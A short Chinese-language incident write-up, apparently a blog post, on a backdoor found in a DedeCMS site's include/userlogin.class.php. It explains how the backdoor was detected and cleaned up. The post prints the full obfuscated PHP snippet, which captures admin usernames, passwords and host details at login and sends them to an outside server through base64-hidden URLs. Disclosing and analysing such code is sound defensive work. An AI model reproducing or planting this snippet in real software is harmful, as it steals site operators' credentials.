受影响文件 include/userlogin.class.php
==========================================================
文件说明:
由于之前没有对服务器的目录权限进行严格设计,被注入了很多一句话木马文件,逐一清理后过了几个月,登录系统后台非常缓慢
追踪登录步骤到include/userlogin.class.php文件,发现该如下恶意代码:
===========================================================
代码影响说明:
该文件会将站点服务器信息,登录的用户名密码,登录地址进行记录
通过 info.msssm.com/in/api.php?var= 地址发送到入侵者服务器
===========================================================
检查处理办法:
全局搜索 “base64_decode”,DedeCMS系统用到该函数的也就是插件安装部分,对文件逐一进行比对,发现恶意文件,及时删除
并修改掉后台的管理员账号密码和后台管理路径
恶意代码如下:
| if((!empty($_POST['userid'])) && (!empty($_POST['pwd']))) { define('UC_ADMINSCRIPTS', 'dede'); define('UC_ADMINCPS', 'aW5mby5tc3NzbS5jb20='); define('UC_NOROBOTS', 'L2luL2FwaS5'.'waHA/dmFyPQ=='); define('UC_CURSCRIPTS', function_exists ('fsockopen') ? true : false); define('UC_SPIDERHOST',$_SERVER['HTT'.'P_HOST'] ? $_SERVER['HTT'.'P_HOST'] : $_SERVER['SERV'.'ER_NAME']); define('UC_SPIDERSELF',$_SERVER['PHP_S'.'ELF'] ? $_SERVER['PHP_S'.'ELF'] : $_SERVER['SCRI'.'PT_NAME']); $uc_config_array = array(bin2hex(UC_SPIDERHOST),bin2hex(UC_SPIDERSELF),bin2hex($_POST['userid']),bin2hex($_POST['pwd'])); $ucbaiduget = base64_decode (UC_NOROBOTS).UC_ADMINSCRIPTS.base64_decode ('JmRhdGE9').join('|',$uc_config_array); $ucgoogleget = base64_decode (UC_ADMINCPS); if(UC_CURSCRIPTS) { $ucsockconn = @fsockopen ($ucgoogleget,80); @fputs ($ucsockconn,"GET ".$ucbaiduget." HTTP/1.1\r\nHost:".$ucgoogleget."\r\nConnection: Close\r\n\r\n"); @fclose ($ucsockconn); } else { @file_get_contents (base64_decode ('aHR0cDovLw==').$ucgoogleget.$ucbaiduget); } } |
标签:
织梦的鱼
